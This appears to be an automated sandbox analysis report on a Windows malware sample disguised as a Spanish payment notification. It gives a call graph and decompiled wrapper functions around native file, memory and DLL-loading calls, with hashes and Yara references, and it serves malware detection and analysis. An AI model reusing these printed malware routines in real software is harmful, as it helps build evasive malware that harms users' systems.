40726b GetFirmwareEnvironmentVariableExW 16525->16527 16528 4072ae 16525->16528 16526->16525 16529 41be60 2 API calls 16527->16529 16530 4072d4 16528->16530 16546 41a570 16528->16546 16529->16525 16530->16103 16534 407449 16533->16534 16535 40742a 16533->16535 16534->16106 16535->16534 16550 4072f0 GetMenuState 16535->16550 16537 407444 16537->16106 16539 407483 16538->16539 16540 40745a 16538->16540 16539->16106 16540->16539 16541 4072f0 GetMenuState 16540->16541 16542 40747e 16541->16542 16542->16106 16544 41a570 LdrLoadDll 16543->16544 16545 4074ee 16544->16545 16545->16061 16547 41a576 16546->16547 16548 41af60 LdrLoadDll 16547->16548 16549 4072c5 16548->16549 16549->16103 16551 407360 16550->16551 16551->16537 16553 40a374 16552->16553 16556 419c40 16553->16556 16555 40a3ae 16555->16114 16557 41af60 LdrLoadDll 16556->16557 16558 419c5c 16557->16558 16558->16555 16560 41b623 16559->16560 16561 40a130 LdrLoadDll 16560->16561 16562 40905a 16561->16562 16562->16067 16564 40a4a3 16563->16564 16565 419c40 LdrLoadDll 16564->16565 16566 40a520 16564->16566 16565->16566 16566->16074 16568 41af60 LdrLoadDll 16567->16568 16569 40d59b 16568->16569 16569->16082 16570 41a780 16569->16570 16571 41af60 LdrLoadDll 16570->16571 16572 41a79f LookupPrivilegeValueW 16571->16572 16572->16078 16574 41af60 LdrLoadDll 16573->16574 16575 41a22c 16574->16575 16575->16081 16577 40a627 16576->16577 16578 40a480 LdrLoadDll 16577->16578 16579 40a656 16578->16579 16579->16004 16581 40d68a 16580->16581 16582 40d740 16580->16582 16583 40a480 LdrLoadDll 16581->16583 16582->16007 16582->16009 16584 40d6ac 16583->16584 16590 419ef0 16584->16590 16586 40d6ee 16593 419f30 16586->16593 16589 41a440 2 API calls 16589->16582 16591 419f0c 16590->16591 16592 41af60 LdrLoadDll 16590->16592 16591->16586 16592->16591 16594 41af60 LdrLoadDll 16593->16594 16595 40d734 16593->16595 16594->16595 16595->16589 16597 40a291 16596->16597 16598 40a28d 16596->16598 16599 40a2dc 16597->16599 16601 40a2aa 16597->16601 16598->16018 16600 419c80 LdrLoadDll 16599->16600 16602 40a2ed 16600->16602 16647 419c80 16601->16647 16602->16018 16606 415006 16605->16606 16607 40d7f0 LdrLoadDll 16605->16607 16606->16020 16607->16606 16609 407e2e 16608->16609 16611 407edc 16608->16611 16610 407210 3 API calls 16609->16610 16613 407e38 16610->16613 16614 407210 3 API calls 16611->16614 16617 407fba 16611->16617 16630 407f9c 16611->16630 16613->16611 16618 407420 GetMenuState 16613->16618 16616 407efd 16614->16616 16619 407420 GetMenuState 16616->16619 16616->16630 16617->16022 16620 407e53 16618->16620 16621 407f18 16619->16621 16622 407450 GetMenuState 16620->16622 16626 407ed2 16620->16626 16650 407b10 16620->16650 16624 407b10 8 API calls 16621->16624 16625 407450 GetMenuState 16621->16625 16628 407f92 16621->16628 16622->16620 16624->16621 16625->16621 16627 4074d0 LdrLoadDll 16626->16627 16627->16611 16629 4074d0 LdrLoadDll 16628->16629 16629->16630 16630->16617 16683 40da60 16630->16683 16632 41af60 LdrLoadDll 16631->16632 16633 40ad62 16632->16633 16634 40d7f0 16633->16634 16635 40d80d 16634->16635 16636 419f70 LdrLoadDll 16635->16636 16638 40d84e 16636->16638 16637 40d855 16637->16026 16638->16637 16639 419fc0 LdrLoadDll 16638->16639 16640 40d87e 16639->16640 16640->16026 16642 41af60 LdrLoadDll 16641->16642 16643 40ae99 16642->16643 16643->16043 16645 41af60 LdrLoadDll 16644->16645 16646 40aeec 16645->16646 16646->16047 16648 40a2cc 16647->16648 16649 41af60 LdrLoadDll 16647->16649 16648->16018 16649->16648 16651 407b35 16650->16651 16691 419cc0 16651->16691 16653 407b89 16653->16620 16655 407c0a 16726 40d940 16655->16726 16656 419eb0 LdrLoadDll 16657 407bad 16656->16657 16657->16655 16659 407bb8 16657->16659 16660 407c36 16659->16660 16694 40af00 16659->16694 16660->16620 16661 407c25 16663 407c42 16661->16663 16664 407c2c 16661->16664 16734 419d40 16663->16734 16666 41a440 2 API calls 16664->16666 16665 407bd2 16665->16660 16714 407940 16665->16714 16666->16660 16670 40af00 2 API calls 16672 407c8d 16670->16672 16672->16660 16738 419d70 16672->16738 16677 419dd0 LdrLoadDll 16678 407cdb 16677->16678 16679 41a440 2 API calls 16678->16679 16680 407ce5 16679->16680 16744 407710 16680->16744 16682 407cf9 16682->16620 16684 40da85 16683->16684 16685 407510 6 API calls 16684->16685 16686 40daa9 16685->16686 16687 407fb0 16686->16687 16688 415690 6 API calls 16686->16688 16690 41bee0 2 API calls 16686->16690 16839 40d8a0 16686->16839 16687->16022 16688->16686 16690->16686 16692 41af60 LdrLoadDll 16691->16692 16693 407b7f 16692->16693 16693->16653 16693->16655 16693->16656 16696 40af2b 16694->16696 16695 40d7f0 LdrLoadDll 16697 40af8a 16695->16697 16696->16695 16698 40afd3 16697->16698 16699 419fc0 LdrLoadDll 16697->16699 16698->16665 16700 40afb5 16699->16700 16701 40afbc 16700->16701 16704 40afdf 16700->16704 16702 41a010 LdrLoadDll 16701->16702 16703 40afc9 16702->16703 16705 41a440 2 API calls 16703->16705 16706 40b049 16704->16706 16707 40b029 16704->16707 16705->16698 16709 41a010 LdrLoadDll 16706->16709 16708 41a440 2 API calls 16707->16708 16710 40b036 16708->16710 16711 40b05b 16709->16711 16710->16665 16712 41a440 2 API calls 16711->16712 16713 40b065 16712->16713 16713->16665 16715 407956 16714->16715 16760 419830 16715->16760 16717 40796f 16718 407ae1 16717->16718 16781 407510 16717->16781 16718->16620 16720 407a55 16720->16718 16721 407710 7 API calls 16720->16721 16722 407a83 16721->16722 16722->16718 16723 419eb0 LdrLoadDll 16722->16723 16724 407ab8 16723->16724 16724->16718 16725 41a4b0 LdrLoadDll 16724->16725 16725->16718 16818 419d00 16726->16818 16731 40d9b1 16731->16661 16732 41a440 2 API calls 16733 40d9a5 16732->16733 16733->16661 16735 419d56 16734->16735 16736 41af60 LdrLoadDll 16735->16736 16737 407c6d 16736->16737 16737->16670 16739 41af60 LdrLoadDll 16738->16739 16740 407cb2 16739->16740 16741 419e00 16740->16741 16742 41af60 LdrLoadDll 16741->16742 16743 407ccc 16742->16743 16743->16677 16745 407739 16744->16745 16824 407680 16745->16824 16747 40774c 16749 41a4b0 LdrLoadDll 16747->16749 16750 4077d7 16747->16750 16752 4077d2 16747->16752 16832 40d9c0 16747->16832 16749->16747 16750->16682 16751 41a440 2 API calls 16753 40780a 16751->16753 16752->16751 16753->16750 16754 419cc0 LdrLoadDll 16753->16754 16755 40786f 16754->16755 16755->16750 16756 419d00 LdrLoadDll 16755->16756 16757 4078d3 16756->16757 16757->16750 16758 415690 6 API calls 16757->16758 16759 407928 16758->16759 16759->16682 16761 41c0b0 2 API calls 16760->16761 16762 419847 16761->16762 16788 408760 16762->16788 16764 419862 16765 4198a0 16764->16765 16766 419889 16764->16766 16769 41be60 2 API calls 16765->16769 16767 41bee0 2 API calls 16766->16767 16768 419896 16767->16768 16768->16717 16770 4198da 16769->16770 16771 41be60 2 API calls 16770->16771 16772 4198f3 16771->16772 16778 419b94 16772->16778 16794 41bea0 16772->16794 16775 419b80 16776 41bee0 2 API calls 16775->16776 16777 419b8a 16776->16777 16777->16717 16779 41bee0 2 API calls 16778->16779 16780 419be9 16779->16780 16780->16717 16782 40760f 16781->16782 16783 407525 16781->16783 16782->16720 16783->16782 16784 415690 6 API calls 16783->16784 16785 407592 16784->16785 16786 41bee0 2 API calls 16785->16786 16787 4075b9 16785->16787 16786->16787 16787->16720 16789 408785 16788->16789 16790 40a130 LdrLoadDll 16789->16790 16791 4087b8 16790->16791 16793 4087dd 16791->16793 16797 40b930 16791->16797 16793->16764 16815 41a530 16794->16815 16798 40b95c 16797->16798 16799 41a190 LdrLoadDll 16798->16799 16800 40b975 16799->16800 16801 40b97c 16800->16801 16808 41a1d0 16800->16808 16801->16793 16805 40b9b7 16806 41a440 2 API calls 16805->16806 16807 40b9da 16806->16807 16807->16793 16809 41a1de 16808->16809 16810 41af60 LdrLoadDll 16809->16810 16811 40b99f 16810->16811 16811->16801 16812 41a7c0 16811->16812 16813 41af60 LdrLoadDll 16812->16813 16814 41a7df 16813->16814 16814->16805 16816 41af60 LdrLoadDll 16815->16816 16817 419b79 16816->16817 16817->16775 16817->16778 16819 40d984 16818->16819 16820 41af60 LdrLoadDll 16818->16820 16819->16733 16821 419da0 16819->16821 16820->16819 16822 41af60 LdrLoadDll 16821->16822 16823 40d995 16822->16823 16823->16731 16823->16732 16825 407698 16824->16825 16826 40a130 LdrLoadDll 16825->16826 16827 4076b3 16826->16827 16828 415a90 LdrLoadDll 16827->16828 16829 4076c3 16828->16829 16830 4076cc PostThreadMessageW 16829->16830 16831 4076e0 16829->16831 16830->16831 16831->16747 16833 40d9d3 16832->16833 16836 419e40 16833->16836 16837 41af60 LdrLoadDll 16836->16837 16838 40d9fe 16837->16838 16838->16747 16840 40d8b1 16839->16840 16848 41a690 16840->16848 16843 40d8f8 16843->16686 16844 419eb0 LdrLoadDll 16845 40d90f 16844->16845 16845->16843 16846 41a4b0 LdrLoadDll 16845->16846 16847 40d92e 16846->16847 16847->16686 16849 41af60 LdrLoadDll 16848->16849 16850 40d8f1 16849->16850 16850->16843 16850->16844

                                              Executed Functions

                                              Function 0041A362 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49filenativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 11 41a362-41a36e 12 41a370-41a3b9 call 41af60 11->12 13 41a35a-41a361 NtCreateFile 11->13
                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00409103,?,004157F7,00409103,FFFFFFFF,?,?,FFFFFFFF,00409103,004157F7,?,00409103,00000060,00000000,00000000), ref: 0041A35D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID: ZUA
                                              • API String ID: 823142352-1484630627
                                              • Opcode ID: 99c5665e71d1234d2cc15bda216b12b88b123dbe340bd1619cf7bf1464753c65
                                              • Instruction ID: 9b940941bda36b1b76fb894d53a4e24529201725bc6a06f281a9c9a88be20db2
                                              • Opcode Fuzzy Hash: 99c5665e71d1234d2cc15bda216b12b88b123dbe340bd1619cf7bf1464753c65
                                              • Instruction Fuzzy Hash: C0016DB22002086FCB04DF98DC85DEB77ADEF8C714F158219BA0D93200D634E8118BA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041A3BA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48filenativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 17 41a3ba-41a3bc 18 41a428-41a439 17->18 19 41a3be-41a3d6 17->19 20 41a3dc-41a409 NtReadFile 19->20 21 41a3d7 call 41af60 19->21 21->20
                                              C-Code - Quality: 16%
                                              			E0041A3BA(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
				void* _t23;
				intOrPtr* _t33;
				intOrPtr* _t35;
				signed int _t37;
				signed int _t39;

				if(__eflags > 0) {
					 *0x0000007E =  *((intOrPtr*)(0x7e)) + 0x7e;
					__eflags =  *((intOrPtr*)(0x7e));
					return  *((intOrPtr*)( *_t33))(_a12);
				} else {
					_t39 = _t37 << 0x55;
					_t18 = _a4;
					_t35 = _a4 + 0xc64;
					E0041AF60( *((intOrPtr*)(_t18 + 0x14)), _t18, _t35,  *((intOrPtr*)(_t18 + 0x14)), 0, 0x2a);
					_t4 =  &_a40; // 0x415671
					_t23 =  *((intOrPtr*)( *_t35))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4, _t33, _t39); // executed
					return _t23;
				}
			}








                                              0x0041a3bc
                                              0x0041a42a
                                              0x0041a42a
                                              0x0041a439
                                              0x0041a3be
                                              0x0041a3be
                                              0x0041a3c3
                                              0x0041a3cf
                                              0x0041a3d7
                                              0x0041a3dc
                                              0x0041a405
                                              0x0041a409
                                              0x0041a409

                                              APIs
                                              • NtReadFile.NTDLL(004159B2,5DA515B3,FFFFFFFF,?,?,?,004159B2,?,qVA,FFFFFFFF,5DA515B3,004159B2,?,00000000), ref: 0041A405
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID: qVA
                                              • API String ID: 2738559852-1195921569
                                              • Opcode ID: 64a8b81d1b146c885d7a465a2046b3f6c53bba05c3fad44dcf3484e1cd6163dd
                                              • Instruction ID: 7d3968b4006926e1df38483a2bbdba915b3b308a85bed2e611cd9c91fb890cc3
                                              • Opcode Fuzzy Hash: 64a8b81d1b146c885d7a465a2046b3f6c53bba05c3fad44dcf3484e1cd6163dd
                                              • Instruction Fuzzy Hash: 970128B6200208AFDB14DF98DC81DDB77A9EF8C754F158249FE1C97241D630E911CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041A3C0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 36filenativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 23 41a3c0-41a409 call 41af60 NtReadFile
                                              C-Code - Quality: 37%
                                              			E0041A3C0(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t13 = _a4;
				_t27 = _a4 + 0xc64;
				E0041AF60( *((intOrPtr*)(_t13 + 0x14)), _t13, _t27,  *((intOrPtr*)(_t13 + 0x14)), 0, 0x2a);
				_t4 =  &_a40; // 0x415671
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t4); // executed
				return _t18;
			}





                                              0x0041a3c3
                                              0x0041a3cf
                                              0x0041a3d7
                                              0x0041a3dc
                                              0x0041a405
                                              0x0041a409

                                              APIs
                                              • NtReadFile.NTDLL(004159B2,5DA515B3,FFFFFFFF,?,?,?,004159B2,?,qVA,FFFFFFFF,5DA515B3,004159B2,?,00000000), ref: 0041A405
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileRead
                                              • String ID: qVA
                                              • API String ID: 2738559852-1195921569
                                              • Opcode ID: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
                                              • Instruction ID: 73ffa567400af51592167d85ddd4e2221f8c27920a6f65a97cb7e9eff46762f8
                                              • Opcode Fuzzy Hash: b510bff5fdfeed8eb0fffb7cee2b24ec4e8af31a288f6594e015d3a0b80bf648
                                              • Instruction Fuzzy Hash: 99F0B7B2200208AFCB14DF99DC85EEB77ADEF8C754F158249BE0D97241D630E811CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0040A130 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 270 40a130-40a14c 271 40a154-40a159 270->271 272 40a14f call 41cdb0 270->272 273 40a15b-40a15e 271->273 274 40a15f-40a16d call 41d1d0 271->274 272->271 277 40a17d-40a18e call 41b500 274->277 278 40a16f-40a17a call 41d450 274->278 283 40a190-40a1a4 LdrLoadDll 277->283 284 40a1a7-40a1aa 277->284 278->277 283->284
                                              C-Code - Quality: 100%
                                              			E0040A130(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041CDB0( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D1D0(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D450( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B500(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                              0x0040a14c
                                              0x0040a14f
                                              0x0040a154
                                              0x0040a159
                                              0x0040a163
                                              0x0040a168
                                              0x0040a16b
                                              0x0040a16d
                                              0x0040a175
                                              0x0040a17a
                                              0x0040a17a
                                              0x0040a181
                                              0x0040a189
                                              0x0040a18c
                                              0x0040a18e
                                              0x0040a1a2
                                              0x00000000
                                              0x0040a1a4
                                              0x0040a1aa
                                              0x0040a15e
                                              0x0040a15e
                                              0x0040a15e

                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040A1A2
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: 14d9637ae75740dab2169e9387d270c154b89039a09ccd4394a8d994bcbcbc66
                                              • Instruction ID: 362e94697f91f25e03f34ab22cb5edf479b96fa73b6a4b5d0a09f6ce58eb7145
                                              • Opcode Fuzzy Hash: 14d9637ae75740dab2169e9387d270c154b89039a09ccd4394a8d994bcbcbc66
                                              • Instruction Fuzzy Hash: 8D0112B5D4020DB7DB10DBA5DC42FDEB7789B54308F0041A6A908A7281F675EB54CB95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041A30A Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 285 41a30a-41a30e 286 41a310-41a335 call 41af60 285->286 287 41a338-41a361 NtCreateFile 285->287 286->287
                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00409103,?,004157F7,00409103,FFFFFFFF,?,?,FFFFFFFF,00409103,004157F7,?,00409103,00000060,00000000,00000000), ref: 0041A35D
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: 84bb8f054b78d2a098247181830a90009f605a74ffb9fbb1720c37eface5a20c
                                              • Instruction ID: 5595e84fc399c294db30b01f44f65e681a7b3b29501624dbdc8fca7861f983bd
                                              • Opcode Fuzzy Hash: 84bb8f054b78d2a098247181830a90009f605a74ffb9fbb1720c37eface5a20c
                                              • Instruction Fuzzy Hash: 1F01AFB6215208ABCB18DF89DC85EEB77ADAF8C754F118258BA0997241D630E8518BA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041A310 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 290 41a310-41a361 call 41af60 NtCreateFile
                                              APIs
                                              • NtCreateFile.NTDLL(00000060,00409103,?,004157F7,00409103,FFFFFFFF,?,?,FFFFFFFF,00409103,004157F7,?,00409103,00000060,00000000,00000000), ref: 0041A35D
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateFile
                                              • String ID:
                                              • API String ID: 823142352-0
                                              • Opcode ID: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
                                              • Instruction ID: 22a17d5a8ca0ee81e299f457139f331d0ae15f1ba5b0ed3d189dcc3aa1234c62
                                              • Opcode Fuzzy Hash: ede47e358c6f592494742841678bda465d8b9d6efb767baf41057bbc73943ae4
                                              • Instruction Fuzzy Hash: 9CF06DB6215208AFCB48DF89DC85EEB77ADAF8C754F158248BA0D97241D630F8518BA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041A4F0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 294 41a4f0-41a506 295 41a50c-41a52d NtAllocateVirtualMemory 294->295 296 41a507 call 41af60 294->296 296->295
                                              C-Code - Quality: 35%
                                              			E0041A4F0(void* __ebx, signed int __ecx, signed int* __edx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				void* _v3;
				intOrPtr _t13;
				long _t18;
				void* _t27;

				_t13 = _a4;
				 *(__ebx + 0x6a561448) =  *(__ebx + 0x6a561448) | __ecx;
				 *__edx =  *__edx ^ __ecx;
				_push(__ecx);
				_t4 = _t13 + 0xc7c; // 0x3c7c
				_t27 = _t4;
				 *((intOrPtr*)(_t27 + 0x50)) =  *((intOrPtr*)(_t27 + 0x50)) + __edx;
				E0041AF60(__ecx);
				_t18 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t18;
			}







                                              0x0041a4f3
                                              0x0041a4f5
                                              0x0041a4fb
                                              0x0041a4fe
                                              0x0041a4ff
                                              0x0041a4ff
                                              0x0041a504
                                              0x0041a507
                                              0x0041a529
                                              0x0041a52d

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B19D,?,0041B19D,?,00000000,?,00003000,00000040,00409103,00000000), ref: 0041A529
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
                                              • Instruction ID: 0f6e90ac6ad316f0230f9505ffb1913ba8f116b783957ff2d7da3ee6bc7086c1
                                              • Opcode Fuzzy Hash: 3937d7bcd71450592b7c43b4c62eb3862b139fe450dcdc5e45fc7760e87cf521
                                              • Instruction Fuzzy Hash: 53F0F2B2210208ABDB14DF89DC81EAB77ADAF8C654F118109BA0897241C630E8118BA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041A4F4 Relevance: 1.5, APIs: 1, Instructions: 26memorynativeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 36%
                                              			E0041A4F4(void* __eax, void* __ebx, signed int __ecx, signed int* __edx) {
				long _t17;
				void* _t26;
				void* _t28;
				void* _t29;

				_t12 = __eax;
				_t29 = _t28 + 1;
				 *(__ebx + 0x6a561448) =  *(__ebx + 0x6a561448) | __ecx;
				 *__edx =  *__edx ^ __ecx;
				_push(__ecx);
				_t3 = _t12 + 0xc7c; // 0x3c7c
				_t26 = _t3;
				 *((intOrPtr*)(_t26 + 0x50)) =  *((intOrPtr*)(_t26 + 0x50)) + __edx;
				E0041AF60(__ecx);
				_t17 = NtAllocateVirtualMemory( *(_t29 + 0xc),  *(_t29 + 0x10),  *(_t29 + 0x14),  *(_t29 + 0x18),  *(_t29 + 0x1c),  *(_t29 + 0x20)); // executed
				return _t17;
			}







                                              0x0041a4f4
                                              0x0041a4f4
                                              0x0041a4f5
                                              0x0041a4fb
                                              0x0041a4fe
                                              0x0041a4ff
                                              0x0041a4ff
                                              0x0041a504
                                              0x0041a507
                                              0x0041a529
                                              0x0041a52d

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B19D,?,0041B19D,?,00000000,?,00003000,00000040,00409103,00000000), ref: 0041A529
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: b4f81707f2b7de57fd2dc404247adcc091755934319da5c644022f49bca311f3
                                              • Instruction ID: 74dfac1be48816c7645cb56de637f97fbd8be5d423e69ae81fbce4f2905d1d4d
                                              • Opcode Fuzzy Hash: b4f81707f2b7de57fd2dc404247adcc091755934319da5c644022f49bca311f3
                                              • Instruction Fuzzy Hash: 0EE06DB11001496BCB04DF98DC84CE777A8EF8C214B15864DFD5C97202C230E861CBB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041A4EA Relevance: 1.5, APIs: 1, Instructions: 25memorynativeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 31%
                                              			E0041A4EA(void* __eax, void* __ebx, signed int __ecx, signed int* __edx, intOrPtr _a8, void* _a12, PVOID* _a16, long _a20, long* _a24, long _a28, long _a32) {
				void* _v3;
				long _t19;
				signed int* _t24;
				void* _t28;

				_t24 = __edx;
				_t21 = __ecx;
				_t14 = __eax + 0x99;
				_pop(_t30);
				if(__eax + 0x99 == 0) {
					_t14 = _a8;
					 *(__ebx + 0x6a561448) =  *(__ebx + 0x6a561448) | __ecx;
					 *__edx =  *__edx ^ __ecx;
					_push(__ecx);
					_t4 = _t14 + 0xc7c; // 0x3c7c
					_t28 = _t4;
				}
				 *((intOrPtr*)(_t28 + 0x50)) =  *((intOrPtr*)(_t28 + 0x50)) + _t24;
				E0041AF60(_t21);
				_t19 = NtAllocateVirtualMemory(_a12, _a16, _a20, _a24, _a28, _a32); // executed
				return _t19;
			}







                                              0x0041a4ea
                                              0x0041a4ea
                                              0x0041a4ea
                                              0x0041a4ec
                                              0x0041a4ed
                                              0x0041a4f3
                                              0x0041a4f5
                                              0x0041a4fb
                                              0x0041a4fe
                                              0x0041a4ff
                                              0x0041a4ff
                                              0x0041a4ff
                                              0x0041a504
                                              0x0041a507
                                              0x0041a529
                                              0x0041a52d

                                              APIs
                                              • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041B19D,?,0041B19D,?,00000000,?,00003000,00000040,00409103,00000000), ref: 0041A529
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.383069133.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_Notificaci#U00f3n de pago.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateMemoryVirtual
                                              • String ID:
                                              • API String ID: 2167126740-0
                                              • Opcode ID: 365bb38cbcf2ef7c2306ef7175cae84be15631ef515134ec9cd32fd0cae4c696
                                              • Instruction ID: 397b95ae5166c2976ce42ef46706b741dec79d1a0ba1e7c6281f34adc7ebd0c7
                                              • Opcode Fuzzy Hash: 365bb38cbcf2ef7c2306ef7175cae84be15631ef515134ec9cd32fd0cae4c696
                                              • Instruction Fuzzy Hash: 0CE012B61045496FCB04DF58D891CDB73A9EF88328710830AF96983286C635D8628BA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0041A43B Relevance: 1.5, APIs: 1, Instructions: 23nativeCOMMON
                                              Download Yara Rule
                                              C-Code - Quality: 62%
                                              			E0041A43B(void* __ecx, void* __esi, intOrPtr _a4, void* _a8) {
				long _t10;

				asm("scasd");
				asm("popfd");
				 *(__esi + 0x55) =  *(__esi + 0x55) & 0x0000008b;
				_t7 = _a4;
				_t4 = _t7 + 0x14; // 0x56c29f0f
				_push(__esi);
				_t5 = _t7 + 0xc6c; // 0x409d6f
				E0041AF60( *_t4, _a4, _t5,  *_t4, 0, 0x2c);
				_t10 = NtClose(_a8); // executed
				return _t10;
			}




                                              0x0041a43b
                                              0x0041a43d
                                              0x0041a43e
                                              0x0041a443
                                              0x0041a446
                                              0x0041a449
                                              0x0041a44f
                                              0x0041a457
                                              0x0041a465
                                              0x0041a469

                                              APIs
                                              • NtClose.NTDLL(00415990,?,?,00415990,00409103,FFFFFFFF), ref: 0041A465
                                              Memory Dump Source
